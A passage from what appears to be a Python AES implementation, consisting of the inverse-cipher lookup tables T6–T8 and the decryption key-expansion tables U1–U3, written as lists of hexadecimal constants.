0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742 ]
T6 = [ 0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857 ]
T7 = [ 0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8 ]
T8 = [ 0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0 ]
# Transformations for decryption key expansion
U1 = [ 0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3 ]
U2 = [ 0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697 ]
U3 = [ 0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46 ]
